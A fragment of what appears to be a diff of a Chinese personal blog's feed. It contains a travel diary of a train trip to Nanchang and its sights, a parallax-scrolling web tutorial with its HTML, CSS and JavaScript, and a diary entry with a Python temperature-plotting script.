    合影!

    ​ 一路下来已经臭烘烘了,干净又卫生啊😅。

    ​ 来跟伟哥合个影。

    07:56 福州路

    南昌著名夜店一条街

    ​ 伟哥在南昌西站下车,我在福州路提前下车,临走前说了 22 年 11 月一样的话“明年见”🫠。

    到福州了🐶

    ​ 福州在南昌的地位还挺高?福州路不仅在市中心,而且还有专门以此命名的地铁站。我想一些地方给道路命名为其它城市的名字,是想给一些在外地的游子一些家的感觉吧。

    08:06 江西宾馆

    江西宾馆

    ​ 房东阿姨允许我提前入住,蛮好。订的民宿在江西宾馆宿舍里,还找了老半天。

    08:19 放置行李

    开躺!

    ​ OK 行李一扔,准备去外面吃个早餐,怕背的《滕王阁序》忘记了,决定直扑滕王阁!

    ​ 感觉这个房东阿姨还比较热情友善,还让她帮忙推荐了一下哪里可以吃早餐😇。

    那你可以到八一公园正对面的一个早餐店
    搜索上营坊街
    走路过去七八分钟
    进上营坊街的第一家店就是
    吃完可以顺道逛一下八一公园,从公园里绕出去中山路
    也可以吃完从公园里过去打卡佑民寺

    09:08 赣面

    赣面 + 瓦罐汤

    ​ 整了一份南昌拌面 + 瓦罐汤,only ¥9。这个南昌拌面比热干面还便宜一块钱?比沙县拌面便宜两块钱,好评啊😍!

    ​ 来南昌前总是很害怕被辣到,结果发现这个赣面的辣度完全在可接受的范围内。

    09:20 八一公园

    八一公园

    ​ 也是一个给老同志休闲的公园,这里的人跟保定人比起来,太“娇小”了😇。

    八一公园 八一公园 八一公园

    ​ 明显感受到这里的空气比保定好多了😍。

    妈的 空气清新多了
    哈哈哈我还没呼吸外面的空气
    要么在地铁
    要么在车站内
    太舒服了

    09:56 八一纪念馆大门

    ​ 南昌八一起义纪念馆是为纪念南昌起义而设立的专题纪念馆,成立于 1956 年,1959 年 10 月 1 日正式对外开放。南昌八一起义纪念馆位于江西省南昌市中山路 380 号,占地面积 5903 平方米。
    ​ 南昌八一起义纪念馆基本陈列陈展各类图片、图表 509 幅,文物展品 407 件(套),艺术品 51 件;陈展内容主要有:新馆大楼南昌起义、人民军队光辉历程以及旧址复原陈列等。
    ​ 南昌八一起义纪念馆是全国文明单位、国家一级博物馆、国家 AAAA 级旅游景区、全国红色旅游工作先进集体、全国首批“爱国主义教育示范基地” 。

    八一纪念馆

    ​ 腿去滕王阁的路上整了杯瑞幸,然后又看到了八一纪念馆,于是我改变主意了。

    纪念馆

    ​ 这个纪念馆里有两个主要建筑:一个江西大旅社(八一起义指挥部旧址)和一个另建的纪念馆。

    八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆

    ​ 与南昌起义有关的人物。

    10:04 江西大旅社

    八一起义指挥部旧址

    ​ 拍一张大旅社正门,进去逛逛。

    八一纪念馆 八一纪念馆 八一纪念馆

    ​ 里面有许多设施以识图还原当时的场景。还有一个大概小学生年纪的小孩在做讲解,天呐😮。虽然我觉得这个小孩是死记硬背的……他说是“汪蒋”先后发动了反革命政变,这人物顺序应该是说反了。

    10:21 八一纪念馆

    联欢大会

    ​ 去参观参观旁边的纪念馆,人挤人🫠。

    八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆

    ​ 八路军当时用过的各种装备。

    10:23 朱德元帅

    朱德元帅

    10:35 万寿宫

    ​ 南昌万寿宫,又称妙济万寿宫,俗称“铁柱宫”,知名中国道教庙宇。坐落于江西省南昌广润门内侧的翠花街上。该地段是今日南昌生意繁荣的商城之一。

    万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫

    ​ 八一纪念馆旁边就是万寿宫,逛一逛。

    ​ 笑死,经典三坊七巷。

    10:38 南昌大饭店

    代表南昌,宴请八方

    ​ 据说这个南昌大饭店,早来的话进去背《滕王阁序》可以白嫖一份霸王餐🤔。

    10:50 府河北路

    滕王阁

    ​ 腿到了江边,江南三大名楼之首出现了!

    11:02 背诵机

    一阵乱背

    ​ 背诵完《滕王阁序》就可以白嫖进滕王阁,准备了两周的我肯定要去试试🤗!

    ​ 有可能是现场背诵有点紧张,再加上卧铺躺得我晕乎乎的,背得十分卡壳,但是最后还是拿下!

    ​ 看样子会背《滕王阁序》的人还是少,大多数人还是选择花钱进滕王阁。

    ​ 这个背诵机器感觉还是有些傻乎乎的,有些字糊着糊着也就混过去了。

    ​ 站在最后边还可以偷偷看前面背的啥,趁机读一段😇,结果我前面的那个没背下来,我拿下了。

    ​ 背完后身份证就会有记录,就可以刷身份证进去了。

    11:08 滕王阁

    台隍枕夷夏之交,宾主尽东南之美

    ​ 滕王阁座落于南昌市西北,赣江东岸。始建于唐永徽四年。为当时任洪州都督的唐高祖李渊之子李元婴所建。据记载,李元婴于永徽三年迁任苏州刺史,调任洪州都督时建此阁以为别居。由于李元婴封号为“滕王”,故名滕王阁。20 多年后,当时的洪州都督阎公首次重修。竣工后,阎公聚集文人雅士作文记事,途经于此的王勃就是于此时写下了其代表名篇《滕王阁序》。并由此令滕王阁名扬四海。韩愈在《新修滕王阁记》中赞道:“愈少时则闻江南多临观之美,而滕王阁独为第一,有‘瑰伟绝特’之称。”清代诗人尚镕《忆滕王阁》诗云:“天下好山水,必有楼台收。山水与楼台,又须文字留。”

    ​ 开始登楼!

    ​ 楼下有一个买纪念品的商店,撒了点币,相当于把门票钱拿去买纪念品了🤧。

    11:14 八一大桥

    八一大桥

    ​ 八一大桥是江西省南昌市主要桥梁之一,连接赣江东岸东湖区的阳明路和沿江北大道及西岸红谷滩新区的庐山南大道,桥面双向四车道(不含两条非机动车道),是南昌交通纽带和标志性建筑。

    ​ 楼上的风可真大啊!冷死我了😭。

    11:26 滕王高阁临江渚

    槛外长江空自流
    槛外长江空自流

    ​ 怕手机被风吹走,只好在里窗台稍微远一点的地方拉一个全景🫠。

    11:26 物华天宝,龙光射牛斗之虚

    滕王阁 滕王阁 滕王阁

    ​ 阁中充满了《滕王阁序》的元素,还摆着许多“宝贝”,仔细看感觉挺假🥸。

    11:35 登顶

    画栋朝飞南浦云

    ​ 这个阁的楼梯十分狭窄,人还多,我怀疑有点安全隐患🤧。

    ​ 登上了滕王阁阳台的顶楼!

    物转星移几度秋
    物转星移几度秋

    ​ 拉一个全景。

    12:01 出!

    披绣闼,俯雕甍

    ​ 这时候人已经有点疲惫了,看攻略觉得南昌晚上比较好玩,于是决定回民宿睡个午觉。

    12:25 江西美术馆

    红彤彤

    ​ 中转地铁途中打卡一下江西美术馆。

    12:27 八一起义纪念塔

    八一

    ​ 中转地铁途中打卡一下八一起义纪念塔。

    江西美术馆

    ​ 在纪念碑底下拍美术馆。

    12:40 福州路

    FUZHOU RD

    ​ 回民宿开躺!

    ]]>
    + 前言
            

    正文

    买票

    ​ 这次回家决定中转一次南昌,和伟哥商量完后觉得买卧铺比较合适,躺一晚上就到了,价格还比较便宜🤔。

    车票

    ​ 伟哥对南昌没有兴趣捏,自己定一个单人间,看一看南昌还有个叫福州路的地方,而且还是市中心?¥132.30,整!

    住宿

    1.19

    14:38 保定站

    保定站

    ​ 中午买好三明治和饭团,14:00 出发前往保定站,在冀 F 的生活要告一段落了。

    14:56 候车

    候车中

    ​ 车次信息:T167

    站名进站时间
    保定15:26
    石家庄17:01
    邯郸18:33
    安阳19:22
    新乡20:24
    郑州21:19
    漯河22:45
    信阳00:15
    武昌03:03
    黄石04:41
    阳新05:12
    瑞昌05:56
    南昌07:27

    ​ 研究了一下这车次还蛮浪漫的,21:00 过黄河,0:00 过淮河,3:00 过长江,1.19 我还是北方人,1.20 我就是南方人了😎!

    15:38 再见冀 F!

    👋

    ​ 绿皮火车的进站到发车时间还挺短,进来以后发现车厢在后面,走过去结果响铃了😅,最后大包小包一阵跑才上了车。

    15:45 烟火气

    车厢内

    ​ 幸好保定站离始发站近,进来以后卧铺旁边还有椅子可以坐😍。

    15:46 中国保定

    某桥

    ​ 从南边逐渐离开了中国保定。

    16:52 石家庄

    淮安桥

    ​ 石家庄槐安桥。

    17:23 零食 Party

    开吃!

    ​ 跟伟哥吃零食唠嗑打发时间。期间还玩起了成语接龙和写同音字的游戏,美丽泉州哥口音不标准是有原因的,他连拼音都没搞清楚😇。

    18:33 邯郸

    夜幕降临

    ​ 天色渐晚,还是没得出河北😇。窗外的风景逐渐看不见了。

    21:06 郑州

    郑州

    ​ 聊着聊着没注意啥时候过了黄河😅。

    ​ 列车员说 22:00 熄灯,我们 21:30 就开躺了。

    太窄了这床
    而且这车也太抖了
    确实啊
    可恶
    凑合着睡吧
    晚安伟哥

    ​ 好久没体验过卧铺了,真是挤啊😅,而且这车况且况且的,注定是一个不眠夜了。

    1.20

    02:39 武汉长江大桥

    武汉长江大桥

    ​ 也不知道睡着了没,半睡半醒的,拿起手机发现即将过了长江。

    我现在应该离小迷糊挺远的

    07:17 南昌

    某桥

    ​ 最后况且况且到 6:00 彻底醒了,索性就下来看看风景了,窗外已不是一片白茫茫,而是绿树成荫。这就是南方!

    ​ 比起河北一片大空地,窗外有些建筑还有些江南水乡的感觉。

    07:29 南昌站

    南昌站

    ​ 下车!

    真爽

    07:45 美丽泉州哥

    合影!

    ​ 一路下来已经臭烘烘了,干净又卫生啊😅。

    ​ 来跟伟哥合个影。

    07:56 福州路

    南昌著名夜店一条街

    ​ 伟哥在南昌西站下车,我在福州路提前下车,临走前说了 22 年 11 月一样的话“明年见”🫠。

    到福州了🐶

    ​ 福州在南昌的地位还挺高?福州路不仅在市中心,而且还有专门以此命名的地铁站。我想一些地方给道路命名为其它城市的名字,是想给一些在外地的游子一些家的感觉吧。

    08:06 江西宾馆

    江西宾馆

    ​ 房东阿姨允许我提前入住,蛮好。订的民宿在江西宾馆宿舍里,还找了老半天。

    08:19 放置行李

    开躺!

    ​ OK 行李一扔,准备去外面吃个早餐,怕背的《滕王阁序》忘记了,决定直扑滕王阁!

    ​ 感觉这个房东阿姨还比较热情友善,还让她帮忙推荐了一下哪里可以吃早餐😇。

    那你可以到八一公园正对面的一个早餐店
    搜索上营坊街
    走路过去七八分钟
    进上营坊街的第一家店就是
    吃完可以顺道逛一下八一公园,从公园里绕出去中山路
    也可以吃完从公园里过去打卡佑民寺

    09:08 赣面

    赣面 + 瓦罐汤

    ​ 整了一份南昌拌面 + 瓦罐汤,only ¥9。这个南昌拌面比热干面还便宜一块钱?比沙县拌面便宜两块钱,好评啊😍!

    ​ 来南昌前总是很害怕被辣到,结果发现这个赣面的辣度完全在可接受的范围内。

    09:20 八一公园

    八一公园

    ​ 也是一个给老同志休闲的公园,这里的人跟保定人比起来,太“娇小”了😇。

    八一公园 八一公园 八一公园

    ​ 明显感受到这里的空气比保定好多了😍。

    妈的 空气清新多了
    哈哈哈我还没呼吸外面的空气
    要么在地铁
    要么在车站内
    太舒服了

    09:56 八一纪念馆大门

    ​ 南昌八一起义纪念馆是为纪念南昌起义而设立的专题纪念馆,成立于 1956 年,1959 年 10 月 1 日正式对外开放。南昌八一起义纪念馆位于江西省南昌市中山路 380 号,占地面积 5903 平方米。
    ​ 南昌八一起义纪念馆基本陈列陈展各类图片、图表 509 幅,文物展品 407 件(套),艺术品 51 件;陈展内容主要有:新馆大楼南昌起义、人民军队光辉历程以及旧址复原陈列等。
    ​ 南昌八一起义纪念馆是全国文明单位、国家一级博物馆、国家 AAAA 级旅游景区、全国红色旅游工作先进集体、全国首批“爱国主义教育示范基地” 。

    八一纪念馆

    ​ 腿去滕王阁的路上整了杯瑞幸,然后又看到了八一纪念馆,于是我改变主意了。

    纪念馆

    ​ 这个纪念馆里有两个主要建筑:一个江西大旅社(八一起义指挥部旧址)和一个另建的纪念馆。

    八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆

    ​ 与南昌起义有关的人物。

    10:04 江西大旅社

    八一起义指挥部旧址

    ​ 拍一张大旅社正门,进去逛逛。

    八一纪念馆 八一纪念馆 八一纪念馆

    ​ 里面有许多设施以识图还原当时的场景。还有一个大概小学生年纪的小孩在做讲解,天呐😮。虽然我觉得这个小孩是死记硬背的……他说是“汪蒋”先后发动了反革命政变,这人物顺序应该是说反了。

    10:21 八一纪念馆

    联欢大会

    ​ 去参观参观旁边的纪念馆,人挤人🫠。

    八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆

    ​ 八路军当时用过的各种装备。

    10:23 朱德元帅

    朱德元帅

    10:35 万寿宫

    ​ 南昌万寿宫,又称妙济万寿宫,俗称“铁柱宫”,知名中国道教庙宇。坐落于江西省南昌广润门内侧的翠花街上。该地段是今日南昌生意繁荣的商城之一。

    万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫

    ​ 八一纪念馆旁边就是万寿宫,逛一逛。

    ​ 笑死,经典三坊七巷。

    10:38 南昌大饭店

    代表南昌,宴请八方

    ​ 据说这个南昌大饭店,早来的话进去背《滕王阁序》可以白嫖一份霸王餐🤔。

    10:50 府河北路

    滕王阁

    ​ 腿到了江边,江南三大名楼之首出现了!

    11:02 背诵机

    一阵乱背

    ​ 背诵完《滕王阁序》就可以白嫖进滕王阁,准备了两周的我肯定要去试试🤗!

    ​ 有可能是现场背诵有点紧张,再加上卧铺躺得我晕乎乎的,背得十分卡壳,但是最后还是拿下!

    ​ 看样子会背《滕王阁序》的人还是少,大多数人还是选择花钱进滕王阁。

    ​ 这个背诵机器感觉还是有些傻乎乎的,有些字糊着糊着也就混过去了。

    ​ 站在最后边还可以偷偷看前面背的啥,趁机读一段😇,结果我前面的那个没背下来,我拿下了。

    ​ 背完后身份证就会有记录,就可以刷身份证进去了。

    11:08 滕王阁

    台隍枕夷夏之交,宾主尽东南之美

    ​ 滕王阁座落于南昌市西北,赣江东岸。始建于唐永徽四年。为当时任洪州都督的唐高祖李渊之子李元婴所建。据记载,李元婴于永徽三年迁任苏州刺史,调任洪州都督时建此阁以为别居。由于李元婴封号为“滕王”,故名滕王阁。20 多年后,当时的洪州都督阎公首次重修。竣工后,阎公聚集文人雅士作文记事,途经于此的王勃就是于此时写下了其代表名篇《滕王阁序》。并由此令滕王阁名扬四海。韩愈在《新修滕王阁记》中赞道:“愈少时则闻江南多临观之美,而滕王阁独为第一,有‘瑰伟绝特’之称。”清代诗人尚镕《忆滕王阁》诗云:“天下好山水,必有楼台收。山水与楼台,又须文字留。”

    ​ 开始登楼!

    ​ 楼下有一个买纪念品的商店,撒了点币,相当于把门票钱拿去买纪念品了🤧。

    11:14 八一大桥

    八一大桥

    ​ 八一大桥是江西省南昌市主要桥梁之一,连接赣江东岸东湖区的阳明路和沿江北大道及西岸红谷滩新区的庐山南大道,桥面双向四车道(不含两条非机动车道),是南昌交通纽带和标志性建筑。

    ​ 楼上的风可真大啊!冷死我了😭。

    11:26 滕王高阁临江渚

    槛外长江空自流
    槛外长江空自流

    ​ 怕手机被风吹走,只好在里窗台稍微远一点的地方拉一个全景🫠。

    11:26 物华天宝,龙光射牛斗之虚

    滕王阁 滕王阁 滕王阁

    ​ 阁中充满了《滕王阁序》的元素,还摆着许多“宝贝”,仔细看感觉挺假🥸。

    11:35 登顶

    画栋朝飞南浦云

    ​ 这个阁的楼梯十分狭窄,人还多,我怀疑有点安全隐患🤧。

    ​ 登上了滕王阁阳台的顶楼!

    物转星移几度秋
    物转星移几度秋

    ​ 拉一个全景。

    12:01 出!

    披绣闼,俯雕甍

    ​ 这时候人已经有点疲惫了,看攻略觉得南昌晚上比较好玩,于是决定回民宿睡个午觉。

    12:25 江西美术馆

    红彤彤

    ​ 中转地铁途中打卡一下江西美术馆。

    12:27 八一起义纪念塔

    八一

    ​ 中转地铁途中打卡一下八一起义纪念塔。

    江西美术馆

    ​ 在纪念碑底下拍美术馆。

    12:40 福州路

    FUZHOU RD

    ​ 回民宿开躺!

    ]]>
    @@ -3424,7 +3424,7 @@ /posts/Web-%E8%A7%86%E5%B7%AE%E6%BB%9A%E5%8A%A8/ - 资源

    演示

    代码

    <!DOCTYPE html>
    <html lang="en">
    <head>
    <title>Parallax Scrolling Website</title>
    <link rel="stylesheet" href="style.css">
    </head>
    <body>
    <header>
    <a href="#" class="logo">Logo</a>
    <ul>
    <li><a href="#" class="active">Home</a></li>
    <li><a href="#">About</a></li>
    <li><a href="#">Work</a></li>
    <li><a href="#">Contact</a></li>
    </ul>
    </header>
    <section>
    <img src="images/stars.png" id="stars">
    <img src="images/moon.png" id="moon">
    <img src="images/mountains_behind.png" id="mountains_behind">
    <h2 id="text">Moon Light</h2>
    <a href="#sec" id="btn">Explore</a>
    <img src="images/mountains_front.png" id="mountains_front">
    </section>
    <div class="sec" id="sec">
    <h2>Parallax Scrolling Effects</h2>
    <p>....</p>
    </div>
    <script>XXX</script>
    </body>
    </html>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: 'Poppins', sans-serif;
    /* 当用户手动导航或者 CSSOM scrolling API 触发滚动操作时 */
    scroll-behavior: smooth;
    }

    body {
    min-height: 100vh;
    overflow-x: hidden;
    background: linear-gradient(#2b1055,#7597de);
    }

    header {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    padding: 30px 100px;
    display: flex;
    justify-content: space-between;
    align-items: center;
    z-index: 10000;
    }

    header .logo {
    color: #fff;
    font-weight: 700;
    text-decoration: none;
    font-size: 2em;
    text-transform: uppercase; /* 大写 */
    letter-spacing: 2px; /* 字符间距 */
    }

    header ul {
    display: flex;
    justify-content: center;
    align-items: center;
    }

    header ul li {
    list-style: none;
    margin-left: 20px;
    }

    header ul li a {
    text-decoration: none;
    padding: 6px 15px;
    color: #fff;
    border-radius: 20px;
    }

    header ul li a:hover,
    header ul li a.active {
    background: #fff;
    color: #2b1055;
    }

    section {
    position: relative;
    width: 100%;
    height: 100vh;
    padding: 100px;
    display: flex;
    justify-content: center;
    align-items: center;
    overflow: hidden;
    }

    section::before {
    content: '';
    position: absolute;
    bottom: 0;
    width: 100%;
    height: 100px;
    background: linear-gradient(to top, #1c0522, transparent);
    z-index: 1000;
    }

    section img {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    /* object-fit CSS 属性指定可替换元素(例如:<img> 或 <video>)的内容应该如何适应到其使用高度和宽度确定的框。*/
    object-fit: cover;
    pointer-events: none;
    }

    section img#moon {
    /* mix-blend-mode CSS 属性描述了元素的内容应该与元素的直系父元素的内容和元素的背景如何混合。*/
    mix-blend-mode: screen;
    }

    section img#mountains_front {
    z-index: 10;
    }

    #text {
    position: absolute;
    right: -350px;
    color: #fff;
    white-space: nowrap;
    font-size: 7.5vw;
    z-index: 9;
    }

    #btn {
    text-decoration: none;
    display: inline-block;
    padding: 8px 30px;
    border-radius: 40px;
    background: #fff;
    color: #2b1055;
    font-size: 1.5em;
    z-index: 9;
    transform: translateY(100px);
    }

    .sec {
    position: relative;
    padding: 100px;
    background: #1c0522;
    }

    .sec h2 {
    font-size: 3.5em;
    margin-bottom: 10px;
    color: #fff;
    }

    .sec p {
    font-size: 1em;
    color: #fff;
    }
    let stars = document.getElementById('stars')
    let moon = document.getElementById('moon')
    let mountains_behind = document.getElementById('mountains_behind')
    let text = document.getElementById('text')
    let btn = document.getElementById('btn')
    let mountains_front = document.getElementById('mountains_front')
    let header = document.querySelector('header')

    window.addEventListener('scroll', function(){
    let value = window.scrollY;
    stars.style.left = value * 0.25 + 'px'
    moon.style.top = value * 1.05 + 'px'
    mountains_behind.style.top = value * 0.5 + 'px'
    mountains_front.style.top = value * 0 + 'px'
    text.style.marginRight = value * 4 + 'px'
    text.style.marginTop = value * 1.5 + 'px'
    btn.style.marginTop = value * 1.5 + 'px'
    header.style.top = value * 0.5 + 'px'
    })

    这段 JavaScript 代码实现了视差滚动效果。具体来说:

    • let 关键字声明了一些变量,如 starsmoonmountains_behind 等等,使用 document.getElementById() 方法获取了每个元素的引用。
    • window.addEventListener('scroll', function(){...}) 给窗口添加了一个滚动事件监听器。当用户滚动页面时,回调函数将被触发。
    • 在回调函数中,通过 window.scrollY 获取当前滚动的垂直距离,并将其赋值给变量 value
    • 接下来,根据 value 的值,通过修改元素的样式属性来实现视差滚动效果。例如,stars.style.leftstars 元素的左侧偏移量设置为 value * 0.25 + 'px'moon.style.topmoon 元素的顶部偏移量设置为 value * 1.05 + 'px',以此类推。
    • 通过修改不同元素的样式属性,可以创建出不同速度和方向的滚动效果,从而实现视差效果。

    总体来说,这段代码使得页面中的一些元素在用户滚动页面时以不同的速度和方向移动,从而营造出立体感和动态效果。

    ]]>
    + 资源

    演示

    代码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <title>Parallax Scrolling Website</title>
    <link rel="stylesheet" href="style.css">
    </head>
    <body>
    <header>
    <a href="#" class="logo">Logo</a>
    <ul>
    <li><a href="#" class="active">Home</a></li>
    <li><a href="#">About</a></li>
    <li><a href="#">Work</a></li>
    <li><a href="#">Contact</a></li>
    </ul>
    </header>
    <section>
    <img src="images/stars.png" id="stars">
    <img src="images/moon.png" id="moon">
    <img src="images/mountains_behind.png" id="mountains_behind">
    <h2 id="text">Moon Light</h2>
    <a href="#sec" id="btn">Explore</a>
    <img src="images/mountains_front.png" id="mountains_front">
    </section>
    <div class="sec" id="sec">
    <h2>Parallax Scrolling Effects</h2>
    <p>....</p>
    </div>
    <script>XXX</script>
    </body>
    </html>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: 'Poppins', sans-serif;
    /* 当用户手动导航或者 CSSOM scrolling API 触发滚动操作时 */
    scroll-behavior: smooth;
    }

    body {
    min-height: 100vh;
    overflow-x: hidden;
    background: linear-gradient(#2b1055,#7597de);
    }

    header {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    padding: 30px 100px;
    display: flex;
    justify-content: space-between;
    align-items: center;
    z-index: 10000;
    }

    header .logo {
    color: #fff;
    font-weight: 700;
    text-decoration: none;
    font-size: 2em;
    text-transform: uppercase; /* 大写 */
    letter-spacing: 2px; /* 字符间距 */
    }

    header ul {
    display: flex;
    justify-content: center;
    align-items: center;
    }

    header ul li {
    list-style: none;
    margin-left: 20px;
    }

    header ul li a {
    text-decoration: none;
    padding: 6px 15px;
    color: #fff;
    border-radius: 20px;
    }

    header ul li a:hover,
    header ul li a.active {
    background: #fff;
    color: #2b1055;
    }

    section {
    position: relative;
    width: 100%;
    height: 100vh;
    padding: 100px;
    display: flex;
    justify-content: center;
    align-items: center;
    overflow: hidden;
    }

    section::before {
    content: '';
    position: absolute;
    bottom: 0;
    width: 100%;
    height: 100px;
    background: linear-gradient(to top, #1c0522, transparent);
    z-index: 1000;
    }

    section img {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    /* object-fit CSS 属性指定可替换元素(例如:<img> 或 <video>)的内容应该如何适应到其使用高度和宽度确定的框。*/
    object-fit: cover;
    pointer-events: none;
    }

    section img#moon {
    /* mix-blend-mode CSS 属性描述了元素的内容应该与元素的直系父元素的内容和元素的背景如何混合。*/
    mix-blend-mode: screen;
    }

    section img#mountains_front {
    z-index: 10;
    }

    #text {
    position: absolute;
    right: -350px;
    color: #fff;
    white-space: nowrap;
    font-size: 7.5vw;
    z-index: 9;
    }

    #btn {
    text-decoration: none;
    display: inline-block;
    padding: 8px 30px;
    border-radius: 40px;
    background: #fff;
    color: #2b1055;
    font-size: 1.5em;
    z-index: 9;
    transform: translateY(100px);
    }

    .sec {
    position: relative;
    padding: 100px;
    background: #1c0522;
    }

    .sec h2 {
    font-size: 3.5em;
    margin-bottom: 10px;
    color: #fff;
    }

    .sec p {
    font-size: 1em;
    color: #fff;
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    let stars = document.getElementById('stars')
    let moon = document.getElementById('moon')
    let mountains_behind = document.getElementById('mountains_behind')
    let text = document.getElementById('text')
    let btn = document.getElementById('btn')
    let mountains_front = document.getElementById('mountains_front')
    let header = document.querySelector('header')

    window.addEventListener('scroll', function(){
    let value = window.scrollY;
    stars.style.left = value * 0.25 + 'px'
    moon.style.top = value * 1.05 + 'px'
    mountains_behind.style.top = value * 0.5 + 'px'
    mountains_front.style.top = value * 0 + 'px'
    text.style.marginRight = value * 4 + 'px'
    text.style.marginTop = value * 1.5 + 'px'
    btn.style.marginTop = value * 1.5 + 'px'
    header.style.top = value * 0.5 + 'px'
    })

    这段 JavaScript 代码实现了视差滚动效果。具体来说:

    • let 关键字声明了一些变量,如 starsmoonmountains_behind 等等,使用 document.getElementById() 方法获取了每个元素的引用。
    • window.addEventListener('scroll', function(){...}) 给窗口添加了一个滚动事件监听器。当用户滚动页面时,回调函数将被触发。
    • 在回调函数中,通过 window.scrollY 获取当前滚动的垂直距离,并将其赋值给变量 value
    • 接下来,根据 value 的值,通过修改元素的样式属性来实现视差滚动效果。例如,stars.style.leftstars 元素的左侧偏移量设置为 value * 0.25 + 'px'moon.style.topmoon 元素的顶部偏移量设置为 value * 1.05 + 'px',以此类推。
    • 通过修改不同元素的样式属性,可以创建出不同速度和方向的滚动效果,从而实现视差效果。

    总体来说,这段代码使得页面中的一些元素在用户滚动页面时以不同的速度和方向移动,从而营造出立体感和动态效果。

    ]]>
    @@ -3449,7 +3449,7 @@ /posts/Diary-10-%E5%80%92%E4%B8%80/ - 前言
            

    东湖公园
    东湖公园 东湖公园 银杏大道 银杏大道 古莲花池
    孔子像

    ​ 研二上结束了!来做一个超长的延时摄影吧!记录一下这个不一样的冬天🥰。

    ​ 如果把这个学期的每一天都看作宽度为 $16$ 像素的长条,那么整个学期就是一张 $2192\times 2192$ 的图片了。


    ​ 气候播报——全,直接从气象站里导表吧:保定市历史天气 (rp5.ru)福州市历史天气 (rp5.ru),然后一阵 py!

    import pandas as pd
    import matplotlib.pyplot as plt
    from datetime import datetime
    import seaborn as sns

    df = pd.read_excel(r'BD.xls', skiprows=6).rename_axis(None)
    time_list = df['当地时间 保定市'][::-1].tolist()
    time_list = [datetime.strptime(x, '%d.%m.%Y %H:%M') for x in time_list]
    temp_list = df['T'][::-1].tolist()

    df2 = pd.read_excel(r'FZ.xls', skiprows=6).rename_axis(None)
    time_list2 = df2['当地时间 福州市'][::-1].tolist()
    time_list2 = [datetime.strptime(x, '%d.%m.%Y %H:%M') for x in time_list2]
    temp_list2 = df2['T'][::-1].tolist()

    sns.set_style("whitegrid")
    plt.rcParams['font.family'] = 'SimHei'

    plt.plot(time_list, temp_list, label="保定")
    plt.plot(time_list2, temp_list2, label="福州")

    plt.xlabel('时间')
    plt.ylabel('温度')
    plt.xticks(time_list[::200])
    plt.legend()
    plt.show()

    全学期温度曲线

    正文

    1.8

    ​ 开始背诵滕王阁序!据说背完滕王阁序就可以免票进滕王阁。明天大早上跑去实验室,趁没人的时候背一段,一周时间大概背完了。

    豫章故郡,洪都新府

    ​ 比起《滕王阁序》里最有名的“落霞与孤鹜齐飞,秋水共长天一色”,我更喜欢后面的这句“关山难越,谁悲失路之人?萍水相逢,尽是他乡之客”。

    ​ 王勃在他二十四岁这年写出了这么优美的文章,而我二十四岁这年写屎一样的论文,喝汤一样😇。


    今天晚上七点在 326 开会,汇报一下近期工作和寒假安排,大家有什么需要说的提前准备好。

    ​ 这学期最后一次组会了!导师还请我们吃糖葫芦🥳。

    pro 神:✌

    1.9

    江西瓦罐汤

    ​ 品尝一下冀大的江西瓦罐汤,到时候看它是否正宗🤔。

    ​ 校园里陆陆续续地出现了拿着行李箱往外走的人,食堂的商铺也陆陆续续收工,寒假就要来到了!


    大家啥时候有时间,咋们啥时候一起吃个饭呀@全体成员

    ​ 临走前,实验室决定最后聚一次餐。

    那咱们就周五晚上,具体时间和地点我到时候再通知哈@全体成员

    1.12

    咕咾肉 西红柿疙瘩汤 大拌菜 豆腐煲 铁锅炖杂鱼 辣子鸡 锅包肘子 驴肉饼 烧鸡

    ​ 师兄挑了一家河北特色饭馆——淀里船宴 · 夜宴。我想这个淀是白洋淀的淀。

    • 点了一份咕咾肉,师弟居然说这道菜让他想起了荔枝肉?震惊我😧。
    • 点了一份辣子鸡,伟哥说这个辣子鸡一点都不辣,鸡肉麻花甚至辣椒都不辣!结果师兄吃了个辣椒直接呛飞😇。
    • 点了一份铁锅炖杂鱼,上面还贴着玉米饼,巨干。其他人觉得鱼太腥了,但我觉得还好,最关键是它很有白洋淀的特色🧐。
    • 还点了保定特色的驴肉!还有师兄至今不敢吃驴……感觉吃得比之前吃的驴肉都香🤗。

    蒋百里

    ​ 吃完后同门三人边走边聊天走回宿舍(pro 神翘掉了这次聚餐😭!)。

    ​ 又是一天雾霾天,逐渐也习惯了🙃。

    1.16

    拜拜 324!

